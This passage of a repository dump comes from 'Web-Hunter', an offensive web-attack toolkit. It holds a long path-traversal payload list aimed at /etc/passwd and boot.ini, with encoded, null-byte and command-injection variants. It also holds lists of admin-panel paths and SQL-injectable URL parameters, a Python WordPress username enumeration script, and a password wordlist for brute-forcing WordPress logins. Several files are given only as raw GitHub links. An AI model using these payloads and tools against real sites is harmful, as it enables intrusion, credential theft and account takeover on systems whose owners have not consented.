..2f..2fetc2fpasswd%00 57 | ..2f..2f..2fetc2fpasswd 58 | ..2f..2f..2fetc2fpasswd%00 59 | ..2f..2f..2f..2fetc2fpasswd 60 | ..2f..2f..2f..2fetc2fpasswd%00 61 | ..2f..2f..2f..2f..2fetc2fpasswd 62 | ..2f..2f..2f..2f..2fetc2fpasswd%00 63 | ..2f..2f..2f..2f..2f..2fetc2fpasswd 64 | ..2f..2f..2f..2f..2f..2fetc2fpasswd%00 65 | ..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 66 | ..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 67 | ..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 68 | ..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 69 | ..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 70 | ..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 71 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 72 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 73 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%255cboot.ini 74 | %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini 75 | ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini 76 | ..\../..\../..\../..\../..\../..\../boot.ini 77 | /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini 78 | ..//..//..//..//..//boot.ini 79 | ../../../../../../../../../../../../boot.ini 80 | ../../boot.ini 81 | ..\../..\../..\../..\../boot.ini 82 | ..\..\..\..\..\..\..\..\..\..\boot.ini 83 | ../../../../../../../../../../../../boot.ini%00 84 | ..\..\..\..\..\..\..\..\..\..\boot.ini%00 85 | /../../../../../../../../../../../boot.ini%00.html 86 | ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini 87 | C:/boot.ini 88 | C:\boot.ini 89 | ../../../../../../../../../../../../boot.ini# 90 | ..\..\..\..\..\..\..\..\..\..\boot.ini# 91 | ../../../../../../../../../../../boot.ini#.html%00../../../../../../etc/passwd 92 | %00/etc/passwd%00 93 | %0a/bin/cat%20/etc/passwd 94 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 95 | ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 96 | ..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd 97 | \\'/bin/cat%20/etc/passwd\\' 98 | /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd 99 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd 100 | /etc/default/passwd 101 | /etc/master.passwd 102 | ././././././././././././etc/passwd 103 | .//.//.//.//.//.//.//.//.//.//.//.//etc//passwd 104 | /./././././././././././etc/passwd 105 | /../../../../../../../../../../etc/passwd 106 | /../../../../../../../../../../etc/passwd^^ 107 | /..\../..\../..\../..\../..\../..\../etc/passwd 108 | /etc/passwd 109 | ../../../../../../../../../../../../etc/passwd 110 | ../../../../../../../../../../../etc/passwd 111 | ../../../../../../../../../../etc/passwd 112 | ../../../../../../../../../etc/passwd 113 | ../../../../../../../../etc/passwd 114 | ../../../../../../../etc/passwd 115 | ../../../../../../etc/passwd 116 | ../../../../../etc/passwd 117 | ../../../../etc/passwd 118 | ../../../etc/passwd 119 | ../../etc/passwd 120 | ../etc/passwd 121 | ..\..\..\..\..\..\..\..\..\..\etc\passwd 122 | .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 123 | \..\..\..\..\..\..\..\..\..\..\etc\passwd 124 | etc/passwd 125 | /etc/passwd%00 126 | ../../../../../../../../../../../../etc/passwd%00 127 | ../../../../../../../../../../../etc/passwd%00 128 | ../../../../../../../../../../etc/passwd%00 129 | ../../../../../../../../../etc/passwd%00 130 | ../../../../../../../../etc/passwd%00 131 | ../../../../../../../etc/passwd%00 132 | ../../../../../../etc/passwd%00 133 | ../../../../../etc/passwd%00 134 | ../../../../etc/passwd%00 135 | ../../../etc/passwd%00 136 | ../../etc/passwd%00 137 | ../etc/passwd%00 138 | ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 139 | \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 140 | /../../../../../../../../../../../etc/passwd%00.html 141 | /../../../../../../../../../../../etc/passwd%00.jpg 142 | ../../../../../../etc/passwd&=%3C%3C%3C%3C 143 | ..2fetc2fpasswd 144 | ..2fetc2fpasswd%00 145 | ..2f..2fetc2fpasswd 146 | ..2f..2fetc2fpasswd%00 147 | ..2f..2f..2fetc2fpasswd 148 | ..2f..2f..2fetc2fpasswd%00 149 | ..2f..2f..2f..2fetc2fpasswd 150 | ..2f..2f..2f..2fetc2fpasswd%00 151 | ..2f..2f..2f..2f..2fetc2fpasswd 152 | ..2f..2f..2f..2f..2fetc2fpasswd%00 153 | ..2f..2f..2f..2f..2f..2fetc2fpasswd 154 | ..2f..2f..2f..2f..2f..2fetc2fpasswd%00 155 | ..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 156 | ..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 157 | ..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 158 | ..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 159 | ..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 160 | ..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 161 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 162 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 163 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%255cboot.ini 164 | %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini 165 | ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini 166 | ..\../..\../..\../..\../..\../..\../boot.ini 167 | /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini 168 | ..//..//..//..//..//boot.ini 169 | ../../../../../../../../../../../../boot.ini 170 | ../../boot.ini 171 | ..\../..\../..\../..\../boot.ini 172 | ..\..\..\..\..\..\..\..\..\..\boot.ini 173 | ../../../../../../../../../../../../boot.ini%00 174 | ..\..\..\..\..\..\..\..\..\..\boot.ini%00 175 | /../../../../../../../../../../../boot.ini%00.html 176 | ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini 177 | C:/boot.ini 178 | C:\boot.ini 179 | ../../../../../../../../../../../../boot.ini# 180 | ..\..\..\..\..\..\..\..\..\..\boot.ini# 181 | ../../../../../../../../../../../boot.ini#.html 182 | 183 | 184 | For More Payloads : https://github.com/emadshanab/LFI-Payload-List/blob/master/LFI%20payloads.txt -------------------------------------------------------------------------------- /core/nmap.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/darkhunter141/Web-Hunter/81a897f5c3f229864cc3fd8570cf042ab22fb94a/core/nmap.py -------------------------------------------------------------------------------- /core/scan.txt: -------------------------------------------------------------------------------- 1 | gallery.php/ 2 | admin.php/ 3 | news.php 4 | main.php 5 | dashboard.php 6 | home.php 7 | products.php 8 | users.php 9 | product.php 10 | adm.php 11 | user.php 12 | events.php 13 | event.php 14 | News.php 15 | Dashboard.phpcu 16 | Home.php 17 | upload.php 18 | images.php 19 | career.php 20 | catagory.php 21 | menu.php 22 | member.php 23 | members.php 24 | detail.php 25 | details.php 26 | edit.php 27 | add.php 28 | Add.php 29 | AddPhoto.php 30 | Photos.php 31 | addphoto.php 32 | password.php 33 | manager.php 34 | manage.php 35 | add_banner.php 36 | banner.php 37 | slider.php 38 | download.php 39 | panel.php 40 | document.php 41 | indexmain.php 42 | index1.php 43 | inner_page.php 44 | admin_home.php 45 | add_cat.php 46 | category.php 47 | columnist.php 48 | comments_display.php 49 | edit_banner.php 50 | edit_columnist.php 51 | edit_gallery.php 52 | edit_menu.php 53 | edit_news_image.php 54 | left_panel.php 55 | list_gallery.php 56 | menu2.php 57 | name_banner.php 58 | new_pass.php 59 | news_edit.php 60 | news_image.php 61 | settings.php 62 | user_add.php 63 | vid_cat.php 64 | video.php 65 | video_edit.php 66 | welcome.php 67 | index.php 68 | add-blog.php 69 | Dashboard 70 | index1.php 71 | default.php 72 | portal.php 73 | adm.aspx 74 | Dashboard.aspx 75 | DashBoard.aspx 76 | Admin.aspx 77 | addblog.php 78 | add_gallery_image.php 79 | php-room.php 80 | add-slider.php 81 | add_testimonials.php 82 | account.php 83 | account.asp 84 | account.html 85 | adminarea.php 86 | admin.asp 87 | AdminDashboard.php 88 | admin-home.php 89 | AdminHome.php 90 | admin.html 91 | banners_report.php 92 | change_gallery.php 93 | checklogin.php 94 | configration.php 95 | CPhome.php 96 | home.html 97 | home.asp 98 | leads.php 99 | main_page.php 100 | ManageAdmin.php 101 | manageImages.php 102 | manage_team.php 103 | member_home.php 104 | uhome.html 105 | userpage.php 106 | viewblog.php 107 | viewmembers.php 108 | voucher.php 109 | welcomepage.php 110 | control_pages.php 111 | admin_home.php 112 | dashboard/index.php 113 | dashbord.php 114 | dash.php 115 | copyright.php 116 | about.php 117 | addpostcat.php 118 | postcatlist.php 119 | addpost.php 120 | postlist.php 121 | slideradd.php 122 | sliderlist.php 123 | catadd.php 124 | catlist.php 125 | brandadd.php 126 | brandlist.php 127 | productadd.php 128 | productlist.php 129 | -------------------------------------------------------------------------------- /core/sqlid.txt: -------------------------------------------------------------------------------- 1 | view_items.php?id= 2 | home.php?cat= 3 | item_book.php?CAT= 4 | www/index.php?page= 5 | schule/termine.php?view= 6 | goods_detail.php?data= 7 | storemanager/contents/item.php?page_code= 8 | view_items.php?id= 9 | customer/board.htm?mode= 10 | help/com_view.html?code= 11 | n_replyboard.php?typeboard= 12 | eng_board/view.php?T****= 13 | prev_results.php?prodID= 14 | bbs/view.php?no= 15 | gnu/?doc= 16 | zb/view.php?uid= 17 | global/product/product.php?gubun= 18 | m_view.php?ps_db= 19 | productlist.php?tid= 20 | product-list.php?id= 21 | onlinesales/product.php?product_id= 22 | garden_equipment/Fruit-Cage/product.php?pr= 23 | product.php?shopprodid= 24 | product_info.php?products_id= 25 | productlist.php?tid= 26 | showsub.php?id= 27 | productlist.php?fid= 28 | products.php?cat= 29 | products.php?cat= 30 | product-list.php?id= 31 | product.php?sku= 32 | store/product.php?productid= 33 | products.php?cat= 34 | productList.php?cat= 35 | product_detail.php?product_id= 36 | product.php?pid= 37 | view_items.php?id= 38 | more_details.php?id= 39 | county-facts/diary/vcsgen.php?id= 40 | idlechat/message.php?id= 41 | podcast/item.php?pid= 42 | products.php?act= 43 | details.php?prodId= 44 | socsci/events/full_details.php?id= 45 | ourblog.php?categoryid= 46 | mall/more.php?ProdID= 47 | archive/get.php?message_id= 48 | review/review_form.php?item_id= 49 | english/publicproducts.php?groupid= 50 | news_and_notices.php?news_id= 51 | rounds-detail.php?id= 52 | gig.php?id= 53 | board/view.php?no= 54 | index.php?modus= 55 | news_item.php?id= 56 | rss.php?cat= 57 | products/product.php?id= 58 | details.php?ProdID= 59 | els_/product/product.php?id= 60 | store/description.php?iddesc= 61 | socsci/news_items/full_story.php?id= 62 | naboard/memo.php?bd= 63 | bookmark/mybook/bookmark.php?bookPageNo= 64 | board/board.html?table= 65 | kboard/kboard.php?board= 66 | order.asp?lotid= 67 | goboard/front/board_view.php?code= 68 | bbs/bbsView.php?id= 69 | boardView.php?bbs= 70 | eng/rgboard/view.php?&bbs_id= 71 | product/product.php?cate= 72 | content.php?p= 73 | page.php?module= 74 | ?pid= 75 | bookpage.php?id= 76 | cbmer/congres/page.php?LAN= 77 | content.php?id= 78 | news.php?ID= 79 | photogallery.php?id= 80 | index.php?id= 81 | product/product.php?product_no= 82 | nyheder.htm?show= 83 | book.php?ID= 84 | print.php?id= 85 | detail.php?id= 86 | book.php?id= 87 | content.php?PID= 88 | more_detail.php?id= 89 | content.php?id= 90 | view_items.php?id= 91 | view_author.php?id= 92 | main.php?id= 93 | english/fonction/print.php?id= 94 | magazines/adult_magazine_single_page.php?magid= 95 | product_details.php?prodid= 96 | magazines/adult_magazine_full_year.php?magid= 97 | products/card.php?prodID= 98 | catalog/product.php?cat_id= 99 | e_board/modifyform.html?code= 100 | community/calendar-event-fr.php?id= 101 | products.php?p= 102 | news.php?id= 103 | StoreRedirect.php?ID= 104 | subcategories.php?id= 105 | tek9.php? 106 | template.php?Action=Item&pid= 107 | topic.php?ID= 108 | tuangou.php?bookid= 109 | type.php?iType= 110 | updatebasket.php?bookid= 111 | updates.php?ID= 112 | view.php?cid= 113 | view_cart.php?title= 114 | view_detail.php?ID= 115 | viewcart.php?CartId= 116 | viewCart.php?userID= 117 | viewCat_h.php?idCategory= 118 | viewevent.php?EventID= 119 | viewitem.php?recor= 120 | viewPrd.php?idcategory= 121 | ViewProduct.php?misc= 122 | voteList.php?item_ID= 123 | whatsnew.php?idCategory= 124 | WsAncillary.php?ID= 125 | WsPages.php?ID=noticiasDetalle.php?xid= 126 | sitio/item.php?idcd= 127 | index.php?site= 128 | de/content.php?page_id= 129 | gallerysort.php?iid= 130 | docDetail.aspx?chnum= 131 | index.php?section= 132 | index.php?page= 133 | index.php?page= 134 | en/publications.php?id= 135 | events/detail.php?ID= 136 | forum/profile.php?id= 137 | media/pr.php?id= 138 | content.php?ID= 139 | cloudbank/detail.php?ID= 140 | pages.php?id= 141 | news.php?id= 142 | beitrag_D.php?id= 143 | content/index.php?id= 144 | index.php?i= 145 | ?action= 146 | index.php?page= 147 | beitrag_F.php?id= 148 | index.php?pageid= 149 | page.php?modul= 150 | detail.php?id= 151 | index.php?w= 152 | index.php?modus= 153 | news.php?id= 154 | news.php?id= 155 | aktuelles/meldungen-detail.php?id= 156 | item.php?id= 157 | obio/detail.php?id= 158 | page/de/produkte/produkte.php?prodID= 159 | packages_display.php?ref= 160 | shop/index.php?cPath= 161 | modules.php?bookid= 162 | view/7/9628/1.html?reply= 163 | product_details.php?prodid= 164 | catalog/product.php?pid= 165 | rating.php?id= 166 | ?page= 167 | catalog/main.php?cat_id= 168 | index.php?page= 169 | detail.php?prodid= 170 | products/product.php?pid= 171 | news.php?id= 172 | book_detail.php?BookID= 173 | catalog/main.php?cat_id= 174 | catalog/main.php?cat_id= 175 | default.php?cPath= 176 | catalog/main.php?cat_id= 177 | catalog/main.php?cat_id= 178 | category.php?catid= 179 | categories.php?cat= 180 | categories.php?cat= 181 | detail.php?prodID= 182 | detail.php?id= 183 | category.php?id= 184 | hm/inside.php?id= 185 | index.php?area_id= 186 | 187 | gallery.php?id= 188 | products.php?cat= 189 | products.php?cat= 190 | media/pr.php?id= 191 | books/book.php?proj_nr= 192 | products/card.php?prodID= 193 | general.php?id= 194 | news.php?t= 195 | usb/devices/showdev.php?id= 196 | content/detail.php?id= 197 | templet.php?acticle_id= 198 | news/news/title_show.php?id= 199 | product.php?id= 200 | index.php?url= 201 | cryolab/content.php?cid= 202 | ls.php?id= 203 | s.php?w= 204 | abroad/page.php?cid= 205 | bayer/dtnews.php?id= 206 | news/temp.php?id= 207 | index.php?url= 208 | book/bookcover.php?bookid= 209 | index.php/en/component/pvm/?view= 210 | product/list.php?pid= 211 | cats.php?cat= 212 | software_categories.php?cat_id= 213 | print.php?sid= 214 | about.php?cartID= 215 | accinfo.php?cartId= 216 | acclogin.php?cartID= 217 | add.php?bookid= 218 | add_cart.php?num= 219 | addcart.php? 220 | addItem.php 221 | add-to-cart.php?ID= 222 | addToCart.php?idProduct= 223 | addtomylist.php?ProdId= 224 | adminEditProductFields.php?intProdID= 225 | advSearch_h.php?idCategory= 226 | affiliate.php?ID= 227 | affiliate-agreement.cfm?storeid= 228 | affiliates.php?id= 229 | ancillary.php?ID= 230 | archive.php?id= 231 | article.php?id= 232 | phpx?PageID 233 | basket.php?id= 234 | Book.php?bookID= 235 | book_list.php?bookid= 236 | book_view.php?bookid= 237 | BookDetails.php?ID= 238 | browse.php?catid= 239 | browse_item_details.php 240 | Browse_Item_Details.php?Store_Id= 241 | buy.php? 242 | buy.php?bookid= 243 | bycategory.php?id= 244 | cardinfo.php?card= 245 | cart.php?action= 246 | cart.php?cart_id= -------------------------------------------------------------------------------- /core/subdomain.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/darkhunter141/Web-Hunter/81a897f5c3f229864cc3fd8570cf042ab22fb94a/core/subdomain.py -------------------------------------------------------------------------------- /core/username.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # -*- coding:utf-8 -*- 3 | import httplib 4 | import socket 5 | import os,sys 6 | import time 7 | import requests 8 | os.system('clear') 9 | def logop(z): 10 | for word in z + '\n': 11 | sys.stdout.write(word) 12 | sys.stdout.flush() 13 | time.sleep(0.0001) 14 | def logop2(z): 15 | for word in z + '\n': 16 | sys.stdout.write(word) 17 | sys.stdout.flush() 18 | time.sleep(0.001) 19 | banner1= '''\033[91m██  ██ ███████ ██████  20 | \033[91m██  ██ ██      ██   ██  21 | \033[91m██  █  ██ █████  ██████   22 | \033[91m██ ███ ██ ██     ██   ██  23 | \033[91m ███ ███  ███████ ██████   24 |                          25 | 26 | ██  ██ ██  ██ ███  ██ ████████ ███████ ██████  27 | ██  ██ ██  ██ ████  ██    ██    ██      ██   ██  28 | ███████ ██  ██ ██ ██  ██  ██  █████  ██████   29 | ██   ██ ██  ██ ██  ██ ██  ██  ██     ██   ██  30 | ██  ██  ██████  ██   ████  ██  ███████ ██  ██  31 | 32 | 33 |                                               34 | ''' 35 | 36 | banner2 ='''\033[93m 37 | Author : Dark Hunter 141 38 | Tool : Web Hunter 39 | Version : 1.0 40 | Github : https://github.com/darkhunter141 41 | Facebook : https://www.facebook.com/darkhunter141 42 | Devolopers: Ashrafi Abir (DarkXploit) 43 | Tanvir Mahamud Shariful (DarkWolf) 44 | 45 | 46 | 47 | \033[0m \033[0;37;41mCreated By Team Dark Hunter 141\033[0m 48 | 49 | \033[0m \033[0;37;41m Wordpress Username Finder\033[0m 50 | 51 | 52 | ''' 53 | os.system('clear') 54 | try: 55 | import requests 56 | import json 57 | from colorama import Fore, Back, Style 58 | import time 59 | import sys 60 | from urlparse import urlparse 61 | except Exception as err: 62 | print "[!] "+str(err) 63 | sys.exit(0) 64 | 65 | 66 | payload ="wp-json/wp/v2/users/" 67 | G = '\033[1;32m' 68 | O = '\033[33m' 69 | 70 | def slowprint(s): 71 | for c in s + '\n': 72 | sys.stdout.write(c) 73 | sys.stdout.flush() 74 | time.sleep(8./90) 75 | 76 | 77 | 78 | def start(argv): 79 | if len(sys.argv) < 2: 80 | print Fore.WHITE+"Usage: python2 username.py link " 81 | sys.exit(1) 82 | url = argv[0] 83 | o = urlparse(url) 84 | if o[0] not in ['http','https']: 85 | print Fore.RED+"[!] Please checkout your URL http:// or https:// "+Fore.RESET 86 | sys.exit(0) 87 | url = sys.argv[1] 88 | if url[-1] != "/": 89 | url+="/" 90 | logop (banner1) 91 | logop2 (banner2) 92 | print Fore.GREEN+"[✓] Scaning Start,Please wait...\n\n[+] Target : "+url+"\n" 93 | print Fore.GREEN+"[+] USERS \n" 94 | GetUsersList(url) 95 | 96 | 97 | 98 | def GetUsersList(url): 99 | 100 | try: 101 | r = requests.get(url+payload) 102 | if r.status_code == 200 : 103 | Pjson = requests.get(url+payload).json() 104 | u =0 105 | for user in Pjson: 106 | u+=1 107 | print Fore.CYAN+"ID : "+str(user["id"])+Fore.RED+" | Name : "+Fore.WHITE+user["name"]+Fore.YELLOW+" | Username: "+user["slug"]+"\n" 108 | 109 | else: 110 | print Fore.RED+"[!] No User found !!" 111 | except requests.exceptions.RequestException as e: 112 | print e 113 | sys.exit(1) 114 | 115 | 116 | 117 | if __name__ == "__main__": 118 | try: 119 | start(sys.argv[1:]) 120 | except KeyboardInterrupt as err: 121 | print "\n[!] By... :)" 122 | sys.exit(0) 123 | -------------------------------------------------------------------------------- /core/whois.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/darkhunter141/Web-Hunter/81a897f5c3f229864cc3fd8570cf042ab22fb94a/core/whois.py -------------------------------------------------------------------------------- /core/wordpress.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/darkhunter141/Web-Hunter/81a897f5c3f229864cc3fd8570cf042ab22fb94a/core/wordpress.py -------------------------------------------------------------------------------- /core/wordpress.txt: -------------------------------------------------------------------------------- 1 | admin 2 | admin1234 3 | meadmin 4 | 123456 5 | password 6 | 12345678 7 | qwerty 8 | 123456789 9 | 12345 10 | 1234 11 | 111111 12 | 1234567 13 | dragon 14 | 123123 15 | baseball 16 | abc123 17 | football 18 | monkey 19 | letmein 20 | 696969 21 | shadow 22 | master 23 | 666666 24 | qwertyuiop 25 | 123321 26 | mustang 27 | 1234567890 28 | michael 29 | 654321 30 | pussy 31 | superman 32 | 1qaz2wsx 33 | 7777777 34 | fuckyou 35 | 121212 36 | 000000 37 | qazwsx 38 | 123qwe 39 | killer 40 | trustno1 41 | jordan 42 | jennifer 43 | zxcvbnm 44 | asdfgh 45 | hunter 46 | buster 47 | soccer 48 | harley 49 | batman 50 | andrew 51 | tigger 52 | sunshine 53 | iloveyou 54 | fuckme 55 | 2000 56 | charlie 57 | robert 58 | thomas 59 | hockey 60 | ranger 61 | daniel 62 | starwars 63 | klaster 64 | 112233 65 | george 66 | asshole 67 | computer 68 | michelle 69 | jessica 70 | pepper 71 | 1111 72 | zxcvbn 73 | 555555 74 | 11111111 75 | 131313 76 | freedom 77 | 777777 78 | pass 79 | fuck 80 | maggie 81 | 159753 82 | aaaaaa 83 | ginger 84 | princess 85 | joshua 86 | cheese 87 | amanda 88 | summer 89 | love 90 | ashley 91 | 6969 92 | nicole 93 | chelsea 94 | biteme 95 | matthew 96 | access 97 | yankees 98 | 987654321 99 | dallas 100 | austin 101 | thunder 102 | taylor 103 | matrix 104 | william 105 | corvette 106 | hello 107 | martin 108 | heather 109 | secret 110 | fucker 111 | merlin 112 | diamond 113 | 1234qwer 114 | gfhjkm 115 | hammer 116 | silver 117 | 222222 118 | 88888888 119 | anthony 120 | justin 121 | test 122 | bailey 123 | q1w2e3r4t5 124 | patrick 125 | internet 126 | scooter 127 | orange 128 | 11111 129 | golfer 130 | cookie 131 | richard 132 | samantha 133 | bigdog 134 | guitar 135 | jackson 136 | whatever 137 | mickey 138 | chicken 139 | sparky 140 | snoopy 141 | maverick 142 | phoenix 143 | camaro 144 | sexy 145 | peanut 146 | morgan 147 | welcome 148 | falcon 149 | cowboy 150 | ferrari 151 | samsung 152 | andrea 153 | smokey 154 | steelers 155 | joseph 156 | mercedes 157 | dakota 158 | arsenal 159 | eagles 160 | melissa 161 | boomer 162 | booboo 163 | spider 164 | nascar 165 | monster 166 | tigers 167 | yellow 168 | xxxxxx 169 | 123123123 170 | gateway 171 | marina 172 | diablo 173 | bulldog 174 | qwer1234 175 | compaq 176 | purple 177 | hardcore 178 | banana 179 | junior 180 | hannah 181 | 123654 182 | porsche 183 | lakers 184 | iceman 185 | money 186 | cowboys 187 | 987654 188 | london 189 | tennis 190 | 999999 191 | ncc1701 192 | coffee 193 | scooby 194 | 0000 195 | miller 196 | boston 197 | q1w2e3r4 198 | fuckoff 199 | brandon 200 | yamaha 201 | chester 202 | mother 203 | forever 204 | johnny 205 | edward 206 | 333333 207 | oliver 208 | redsox 209 | player 210 | nikita 211 | knight 212 | fender 213 | barney 214 | midnight 215 | please 216 | brandy 217 | chicago 218 | badboy 219 | iwantu 220 | slayer 221 | rangers 222 | charles 223 | angel 224 | flower 225 | bigdaddy 226 | rabbit 227 | wizard 228 | bigdick 229 | jasper 230 | enter 231 | rachel 232 | chris 233 | steven 234 | winner 235 | adidas 236 | victoria 237 | natasha 238 | 1q2w3e4r 239 | jasmine 240 | winter 241 | prince 242 | panties 243 | marine 244 | ghbdtn 245 | fishing 246 | cocacola 247 | casper 248 | james 249 | 232323 250 | raiders 251 | 888888 252 | marlboro 253 | gandalf 254 | asdfasdf 255 | crystal 256 | 87654321 257 | 12344321 258 | sexsex 259 | golden 260 | blowme 261 | bigtits 262 | 8675309 263 | panther 264 | lauren 265 | angela 266 | bitch 267 | spanky 268 | thx1138 269 | angels 270 | madison 271 | winston 272 | shannon 273 | mike 274 | toyota 275 | blowjob 276 | jordan23 277 | canada 278 | sophie 279 | Password 280 | apples 281 | dick 282 | tiger 283 | razz 284 | 123abc 285 | pokemon 286 | qazxsw 287 | 55555 288 | qwaszx 289 | muffin 290 | johnson 291 | murphy 292 | cooper 293 | jonathan 294 | liverpoo 295 | david 296 | danielle 297 | 159357 298 | jackie 299 | 1990 300 | 123456a 301 | 789456 302 | turtle 303 | horny 304 | abcd1234 305 | scorpion 306 | qazwsxedc 307 | 101010 308 | butter 309 | carlos 310 | password1 311 | dennis 312 | slipknot 313 | qwerty123 314 | booger 315 | asdf 316 | 1991 317 | black 318 | startrek 319 | 12341234 320 | cameron 321 | newyork 322 | rainbow 323 | nathan 324 | john 325 | 1992 326 | rocket 327 | viking 328 | redskins 329 | butthead 330 | asdfghjkl 331 | 1212 332 | sierra 333 | peaches 334 | gemini 335 | doctor 336 | wilson 337 | sandra 338 | helpme 339 | qwertyui 340 | victor 341 | florida 342 | dolphin 343 | pookie 344 | captain 345 | tucker 346 | blue 347 | liverpool 348 | theman 349 | bandit 350 | dolphins 351 | maddog 352 | packers 353 | jaguar 354 | lovers 355 | nicholas 356 | united 357 | tiffany 358 | maxwell 359 | zzzzzz 360 | nirvana 361 | jeremy 362 | suckit 363 | stupid 364 | porn 365 | monica 366 | elephant 367 | giants 368 | jackass 369 | hotdog 370 | rosebud 371 | success 372 | debbie 373 | mountain 374 | 444444 375 | xxxxxxxx 376 | warrior 377 | 1q2w3e4r5t 378 | q1w2e3 379 | 123456q 380 | albert 381 | metallic 382 | lucky 383 | azerty 384 | 7777 385 | shithead 386 | alex 387 | bond007 388 | alexis 389 | 1111111 390 | samson 391 | 5150 392 | willie 393 | scorpio 394 | bonnie 395 | gators 396 | benjamin 397 | voodoo 398 | driver 399 | dexter 400 | 2112 401 | jason 402 | calvin 403 | freddy 404 | 212121 405 | creative 406 | 12345a 407 | sydney 408 | rush2112 409 | 1989 410 | asdfghjk 411 | red123 412 | bubba 413 | 4815162342 414 | passw0rd 415 | trouble 416 | gunner 417 | happy 418 | fucking 419 | gordon 420 | legend 421 | jessie 422 | stella 423 | qwert 424 | eminem 425 | arthur 426 | apple 427 | nissan 428 | bullshit 429 | bear 430 | america 431 | 1qazxsw2 432 | nothing 433 | parker 434 | 4444 435 | rebecca 436 | qweqwe 437 | garfield 438 | 01012011 439 | beavis 440 | 69696969 441 | jack 442 | asdasd 443 | december 444 | 2222 445 | 102030 446 | 252525 447 | 11223344 448 | magic 449 | apollo 450 | skippy 451 | 315475 452 | girls 453 | kitten 454 | golf 455 | copper 456 | braves 457 | shelby 458 | godzilla 459 | beaver 460 | fred 461 | tomcat 462 | august 463 | buddy 464 | airborne 465 | 1993 466 | 1988 467 | lifehack 468 | qqqqqq 469 | brooklyn 470 | animal 471 | platinum 472 | phantom 473 | online 474 | xavier 475 | darkness 476 | blink182 477 | power 478 | fish 479 | green 480 | 789456123 481 | voyager 482 | police 483 | travis 484 | 12qwaszx 485 | heaven 486 | snowball 487 | lover 488 | abcdef 489 | 00000 490 | pakistan 491 | 007007 492 | walter 493 | playboy 494 | blazer 495 | cricket 496 | sniper 497 | hooters 498 | donkey 499 | willow 500 | loveme 501 | saturn 502 | therock 503 | redwings 504 | bigboy 505 | pumpkin 506 | trinity 507 | williams 508 | tits 509 | nintendo 510 | digital 511 | destiny 512 | topgun 513 | runner 514 | marvin 515 | guinness 516 | chance 517 | bubbles 518 | testing 519 | fire 520 | november 521 | minecraft 522 | asdf1234 523 | lasvegas 524 | sergey 525 | broncos 526 | cartman 527 | private 528 | celtic 529 | birdie 530 | little 531 | cassie 532 | babygirl 533 | donald 534 | beatles 535 | 1313 536 | dickhead 537 | family 538 | 12121212 539 | school 540 | louise 541 | gabriel 542 | eclipse 543 | fluffy 544 | 147258369 545 | lol123 546 | explorer 547 | beer 548 | nelson 549 | flyers 550 | spencer 551 | scott 552 | lovely 553 | gibson 554 | doggie 555 | cherry 556 | andrey 557 | snickers 558 | buffalo 559 | pantera 560 | metallica 561 | member 562 | carter 563 | qwertyu 564 | peter 565 | alexande 566 | steve 567 | bronco 568 | paradise 569 | goober 570 | 5555 571 | samuel 572 | montana 573 | mexico 574 | dreams 575 | michigan 576 | cock 577 | carolina 578 | yankee 579 | friends 580 | magnum 581 | surfer 582 | poopoo 583 | maximus 584 | genius 585 | cool 586 | vampire 587 | lacrosse 588 | asd123 589 | aaaa 590 | christin 591 | kimberly 592 | speedy 593 | sharon 594 | carmen 595 | 111222 596 | kristina 597 | sammy 598 | racing 599 | ou812 600 | sabrina 601 | horses 602 | 0987654321 603 | qwerty1 604 | pimpin 605 | baby 606 | stalker 607 | enigma 608 | 147147 609 | star 610 | poohbear 611 | boobies 612 | 147258 613 | simple 614 | bollocks 615 | 12345q 616 | marcus 617 | brian 618 | 1987 619 | qweasdzxc 620 | drowssap 621 | hahaha 622 | 